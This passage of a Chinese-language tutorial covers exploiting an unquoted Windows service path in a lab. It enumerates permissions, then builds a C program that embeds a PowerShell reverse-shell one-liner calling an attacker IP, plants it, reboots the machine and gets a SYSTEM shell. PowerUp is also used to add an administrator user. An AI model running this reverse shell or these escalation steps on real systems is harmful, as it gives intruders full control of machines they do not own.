<li>(W) Write【写入】</li>
</ul>
<p>【知识2】：我们会经常见到的用户/组如下：</p>
<ul>
<li>当前登录用户，如 bob。</li>
<li>Authenticated Users【注：通过 <strong>控制台、RDP、WinRM、SMB</strong> 登录系统的用户都属于已认证用户。】</li>
<li>Everyone</li>
<li>BUILTIN\Users</li>
<li>NT AUTHORITY\INTERACTIVE</li>
</ul>
<p>接下来，我们打算从左到右开始目录的权限检查，例如：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">icacls C:\</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">icacls &quot;C:\Program Files&quot;</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">icacls &quot;C:\Program Files\Juggernaut Prod&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-55.png" alt="" class="img_ev3q"></p>
<p>可以看到，沿着未引用的文件路径我们找到了可写目录，而这就是可以进行恶意操作的地方！</p>
<p>关于上面的输出内容，这里有三点需要提及一下：</p>
<ul>
<li>第一，我们经常会看到通过身份验证的用户在默认情况下拥有对 <code>C:\</code> 的修改权限。<strong>然而，这其实是一种特殊的高级权限，它实际上只允许在该位置创建子目录，而无法向其根目录下写入可执行文件或任何文件</strong>！【注：普通用户是可以在C盘根目录下创建子目录，然后在子目录中写入文件。】</li>
<li>第二，通常情况下，我们是无法将<strong>文件</strong>写入 <code>C:\</code> 或 <code>C:\Program Files</code>，但依旧值得去尝试检查一下，万一用户误配置呢。【注：只有<strong>本地管理员组的用户在高完整性 shell</strong> 中才能在这些目录的根下写入文件，注意是写入文件而不是新建目录，因为对于C盘来说新建目录是个例外。】</li>
<li>第三，为什么我们不直接检查路径中的最后一个目录？因为那是包含实际服务启动程序的目录。而如果在那里有写入权限，那这就是<strong>服务的弱权限文件</strong>漏洞了，而不需要使用<strong>未引用的服务路径</strong>来利用它。</li>
</ul>
<p>就简单测试来说，当我们试图将 EXE 文件或 TXT 文件移动或写入到 <code>C:\</code> 时，我们会被提示拒绝访问。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-56.png" alt="" class="img_ev3q"></p>
<h4 class="anchor anchorWithStickyNavbar_LWe7" id="32powershellget-acl"><strong><div id="id3.2">3.2、PowerShell（Get-ACL）</div></strong><a href="#32powershellget-acl" class="hash-link" aria-label="Direct link to 32powershellget-acl" title="Direct link to 32powershellget-acl">​</a></h4>
<p>也可以在 PowerShell 会话中使用以下命令执行相同的枚举：</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Get-Acl -Path C:\ | Format-List</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Get-Acl -Path &quot;C:\Program Files&quot; | Format-List</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">Get-Acl -Path &quot;C:\Program Files\Juggernaut Prod&quot; | Format-List</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-57.png" alt="" class="img_ev3q"></p>
<p>在上面我们可以看到，它并没有像 icacls 那样在 <code>C:\</code> 上显示“Modify”。相反，它提供了 &quot;访问掩码格式&quot;，上面的数字其实也就是 “Modify”的数字表示形式。</p>
<blockquote>
<p>注：<code>Get-Acl -Path C:\ | Format-List</code>和 <code>Get-Acl -Path C: | Format-List</code> 输出的结果还是有所不同。主要是由于 <code>C:\</code> 和 <code>C:</code> 在 Windows 文件系统中有着不同的语义，<code>C:\</code> 代表完整的根目录路径，而 <code>C:</code>  仅表示 C 盘当前所在的活动工作目录，一般是 <code>C:\Users\YourName</code>，但也不绝对。</p>
</blockquote>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-59.png" alt="" class="img_ev3q"></p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-60.png" alt="" class="img_ev3q"></p>
<h4 class="anchor anchorWithStickyNavbar_LWe7" id="33accesschk"><strong><div id="id3.3">3.3、accesschk</div></strong><a href="#33accesschk" class="hash-link" aria-label="Direct link to 33accesschk" title="Direct link to 33accesschk">​</a></h4>
<p>接下来，使用 <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite" target="_blank" rel="noopener noreferrer">Sysinternals</a> 工具套件的 Accesschk64.exe 工具来对目录权限进行查看。</p>
<p>将 accesschk64.exe 的副本下载并传输到受害者机器上。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-61.png" alt="" class="img_ev3q"></p>
<p>然后使用以下命令来枚举相同的目录：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">.\accesschk64.exe -wvud &quot;C:\&quot; -accepteula</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">.\accesschk64.exe -wvud &quot;C:\Program Files&quot; -accepteula</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">.\accesschk64.exe -wvud &quot;C:\Program Files\Juggernaut Prod&quot; -accepteula</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-63.png" alt="" class="img_ev3q"></p>
<p>从上面可以看到，accesschk 为我们提供了关于 <code>C:\</code> 目录上最准确的权限说明，即 <strong>当前用户虽然拥有 W 写访问权限，但实际仅限于创建文件夹</strong> (FILE_ADD_SUBDIRECTORY)。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-64.png" alt="" class="img_ev3q"></p>
<p>由于当前用户不能在 <code>C:\Program Files</code> 目录中写入文件， 再加上 accesschk64.exe -w 选项只过滤写访问的原因，所以在上面的输出中我们并不能看到有关标准用户的任何结果。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-65.png" alt="" class="img_ev3q"></p>
<p>最后，在上面可以看到，标准用户拥有大量的 FILE_WRITE 和 FILE_ADD 权限，但并没有显示“完全访问”。这可以推断为修改权限。</p>
<h4 class="anchor anchorWithStickyNavbar_LWe7" id="34winpeas"><strong><div id="id3.4">3.4、winPEAS</div></strong><a href="#34winpeas" class="hash-link" aria-label="Direct link to 34winpeas" title="Direct link to 34winpeas">​</a></h4>
<p>之前在使用 winPEAS 时，看到“Service Information”部分有一个未引用的服务路径。</p>
<p>从那里开始继续向下滚动到“Application Information”部分，然后检查“Installed Applications”子部分。如果我们能够利用该服务，那么就能从这里找到拥有写入权限的未引用服务路径中的那个目录。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-66.png" alt="" class="img_ev3q"></p>
<p>如果在这部分中没有找到与我们发现的未引用服务路径相关联的可写目录，那么我们很可能也无法利用该服务。如果出现了这种情况，那么在彻底排除这一发现之前，仍应继续使用上述其它的手动方法继续确认，以防误报。</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="4自制反向-shell-载荷"><strong><div id="id4">4、自制反向 shell 载荷</div></strong><a href="#4自制反向-shell-载荷" class="hash-link" aria-label="Direct link to 4自制反向-shell-载荷" title="Direct link to 4自制反向-shell-载荷">​</a></h2>
<p>截至目前，我们发现的信息有：</p>
<ul>
<li>有一个服务存在未引用的服务路径，路径是 <code>C:\Program Files\Juggernaut Prod\Production Tools\Juggernaut.exe</code>。</li>
<li>该服务是开机自启动服务，且当前用户具有 SeShutdown 特权。</li>
<li>当前用户可以在 <code>C:\Program Files\Juggernaut Prod\</code> 目录写入文件。</li>
</ul>
<p>这种权限升级技术的下一步便是制作一个自定义漏洞利用程序，并将其放在 <code>C:\Program Files\Juggernaut Prod\</code> 中。为此，我制作了一个自定义可执行文件，它可以在攻击者的机器上直接编译。</p>
<div class="language-c codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-c codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token macro property directive-hash" style="color:#36acaa">#</span><span class="token macro property directive keyword" style="color:#00009f">include</span><span class="token macro property" style="color:#36acaa"> </span><span class="token macro property string" style="color:#e3116c">&lt;windows.h&gt;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token macro property directive-hash" style="color:#36acaa">#</span><span class="token macro property directive keyword" style="color:#00009f">include</span><span class="token macro property" style="color:#36acaa"> </span><span class="token macro property string" style="color:#e3116c">&lt;stdio.h&gt;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token keyword" style="color:#00009f">int</span><span class="token plain"> </span><span class="token function" style="color:#d73a49">main</span><span class="token punctuation" style="color:#393A34">(</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">{</span><span class="token plain"> </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">    </span><span class="token function" style="color:#d73a49">system</span><span class="token punctuation" style="color:#393A34">(</span><span class="token string" style="color:#e3116c">&quot;whoami &gt;&gt; C:\\temp\\whoami.txt&quot;</span><span class="token punctuation" style="color:#393A34">)</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">    </span><span class="token keyword" style="color:#00009f">return</span><span class="token plain"> </span><span class="token number" style="color:#36acaa">0</span><span class="token punctuation" style="color:#393A34">;</span><span class="token plain"> </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token punctuation" style="color:#393A34">}</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>可以看到，我们的可执行文件将运行 whoami 命令，并将输出结果重定向到一个文件。虽然这是一个很酷的 POC，但我们真正想要的是一个反向 shell。</p>
<p>为此，让我们编辑此脚本中的 whoami 命令并将其替换为下面的 PowerShell 1-liner 命令，这样就能在执行该命令时获得一个反向 shell：</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">&quot;powershell.exe -nop -c \&quot;$client = New-Object System.Net.Sockets.TCPClient(&#x27;172.16.1.30&#x27;,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + &#x27;PS &#x27; + (pwd).Path + &#x27;&gt; &#x27;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\&quot;&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<blockquote>
<p>注：脚本中的 IP 为攻击者机器的 IP 地址。</p>
</blockquote>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-71.png" alt="" class="img_ev3q"></p>
<blockquote>
<p>请注意，上述的 PowerShell 命令周围的双引号旁边的转义字符是需要存在的。这是为了让代码将它们读作字面上的双引号，因为如果没有双引号，代码将无法编译，或者即使编译了也无法运行。</p>
</blockquote>
<p>现在 exploit.c 文件可以编译了，可以使用 mingw-w64 或以下命令直接在攻击者机器上编译它：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">x86_64-w64-mingw32-gcc exploit.c -o Production.exe</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-69.png" alt="" class="img_ev3q"></p>
<p>编译完成之后便可将恶意程序传输到受害者机器。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-70.png" alt="" class="img_ev3q"></p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="5利用未引用的服务路径"><strong><div id="id5">5、利用未引用的服务路径</div></strong><a href="#5利用未引用的服务路径" class="hash-link" aria-label="Direct link to 5利用未引用的服务路径" title="Direct link to 5利用未引用的服务路径">​</a></h2>
<p>接下来，只需将漏洞利用程序移到 <code>&quot;C:\Program Files\Juggernaut Prod &quot;</code> 目录中，然后在攻击者机器上启动 443 端口的 netcat 监听器，最后重启受害者机器即可。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-72.png" alt="" class="img_ev3q"></p>
<p>重新启动计算机可以使用以下命令：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">shutdown /r /t 0 /f</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>回到监听器，我们就得到了一个 SYSTEM shell！</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-73.png" alt="" class="img_ev3q"></p>
<blockquote>
<p>有时候在回到监听器的时候发现好像并没有发生什么变化，也没有出现任何提示，这时只需按下回车键，提示就会出现。</p>
</blockquote>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="6滥用-powerupps1-功能"><strong><div id="id6">6、滥用 PowerUp.ps1 功能</div></strong><a href="#6滥用-powerupps1-功能" class="hash-link" aria-label="Direct link to 6滥用-powerupps1-功能" title="Direct link to 6滥用-powerupps1-功能">​</a></h2>
<p>之前在 <a href="#id2.2.1">2.2.1 小节</a>的时候，当我们使用 PowerUp.ps1 枚举未引用的服务路径时，它显示有 AbuseFunction (滥用)字段。现在，我们可以用它来利用这个漏洞。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-74.png" alt="" class="img_ev3q"></p>
<p>使用此 AbuseFunction 将会在当前目录下创建一个恶意程序，而运行该程序将会创建一个新用户，并将该用户归入管理员组。【注：以当前普通用户的身份单独执行该程序是不起作用的。】</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">Write-ServiceBinary -ServiceName &#x27;Juggernaut&#x27;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-76.png" alt="" class="img_ev3q"></p>
<p>此时，我们需要将上述生成 service.exe 程序写入 <code>&quot;C:\Program Files\Juggernaut Prod&quot;</code> ，然后将其重命名为 Production.exe。</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-77.png" alt="" class="img_ev3q"></p>
<p>现在，当我们重启系统并回到之前的反向 shell 时，可以看到新的用户已创建并被添加到了本地管理员组！</p>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-78.png" alt="" class="img_ev3q"></p>
<p>此时，如果很幸运发现目标系统的 RDP 服务是打开的，那我们就可以使用 xfreerdp 进行 RDP 登录，然后以“以管理员身份运行”打开 cmd，进入到具有完全权限的高完整性 shell 中。</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">sudo xfreerdp /u:john /p:&#x27;Password123!&#x27; /v:172.16.1.50 +clipboard</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="Copy code to clipboard" title="Copy" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="https://juggernaut-sec.com/wp-content/uploads/2022/06/image-79-1024x830.png" alt="" class="img_ev3q"></p>
<p>但是，如果目标没有打开 RDP 服务。此时，我们就需要通过 <a href="https://www.cnblogs.com/kqdssheng/p/18751119" target="_blank" rel="noopener noreferrer">Runas</a> 和 <a href="https://www.cnblogs.com/kqdssheng/p/18745249" target="_blank" rel="noopener noreferrer">UAC-bypass</a> 技术来获取管理员高完整性 shell。</p></div><footer class="theme-doc-footer docusaurus-mt-lg"><div class="row margin-top--sm theme-doc-footer-edit-meta-row"><div class="col"><a href="https://github.com/facebook/docusaurus/tree/main/packages/create-docusaurus/templates/shared/docs/tutorial-basics/未引用的服务路径 - Windows特权升级.md" target="_blank" rel="noopener noreferrer" class="theme-edit-this-page"><svg fill="currentColor" height="20" width="20" viewBox="0 0 40 40" class="iconEdit_Z9Sw" aria-hidden="true"><g><path d="m34.5 11.7l-3 3.1-6.3-6.3 3.1-3q0.5-0.5 1.2-0.5t1.1 0.5l3.9 3.9q0.5 0.4 0.5 1.1t-0.5 1.2z m-29.5 17.1l18.4-18.5 6.3 6.3-18.4 18.4h-6.3v-6.2z"></path></g></svg>Edit this page</a></div><div class="col lastUpdated_JAkA"></div></div></footer></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/blog/docs/tutorial-basics/congratulations"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">Congratulations!</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/blog/docs/tutorial-basics/DLL劫持 - Windows特权升级"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">DLL劫持 - Windows特权升级</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#导航" class="table-of-contents__link toc-highlight">导航</a></li><li><a href="#0前言" class="table-of-contents__link toc-highlight"><strong><div>0、前言</div></strong></a></li><li><a href="#1未引用的服务路径漏洞原理" class="table-of-contents__link toc-highlight"><strong><div>1、未引用的服务路径漏洞原理</div></strong></a></li><li><a href="#2搜寻未引用的服务路径" class="table-of-contents__link toc-highlight"><strong><div>2、搜寻未引用的服务路径</div></strong></a></li><li><a href="#3沿着服务路径枚举目录权限" class="table-of-contents__link toc-highlight"><strong><div>3、沿着服务路径枚举目录权限</div></strong></a></li><li><a href="#4自制反向-shell-载荷" class="table-of-contents__link toc-highlight"><strong><div>4、自制反向 shell 载荷</div></strong></a></li><li><a href="#5利用未引用的服务路径" class="table-of-contents__link toc-highlight"><strong><div>5、利用未引用的服务路径</div></strong></a></li><li><a href="#6滥用-powerupps1-功能" class="table-of-contents__link toc-highlight"><strong><div>6、滥用 PowerUp.ps1 功能</div></strong></a></li></ul></div></div></div></div></main></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="col footer__col"><div class="footer__title">Docs</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="/blog/docs/intro">Tutorial</a></li></ul></div><div class="col footer__col"><div class="footer__title">Community</div><ul class="footer__items clean-list"><li class="footer__item"><a href="https://stackoverflow.com/questions/tagged/docusaurus" target="_blank" rel="noopener noreferrer" class="footer__link-item">Stack Overflow<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li class="footer__item"><a href="https://discordapp.com/invite/docusaurus" target="_blank" rel="noopener noreferrer" class="footer__link-item">Discord<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li class="footer__item"><a href="https://x.com/docusaurus" target="_blank" rel="noopener noreferrer" class="footer__link-item">X<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div><div class="col footer__col"><div class="footer__title">More</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="/blog/">Blog</a></li><li class="footer__item"><a href="https://github.com/facebook/docusaurus" target="_blank" rel="noopener noreferrer" class="footer__link-item">GitHub<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div></div><div class="footer__bottom text--center"><div class="footer__copyright">Copyright © 2025 My Project, Inc. Built with Docusaurus.</div></div></div></footer></div>
</body>
</html>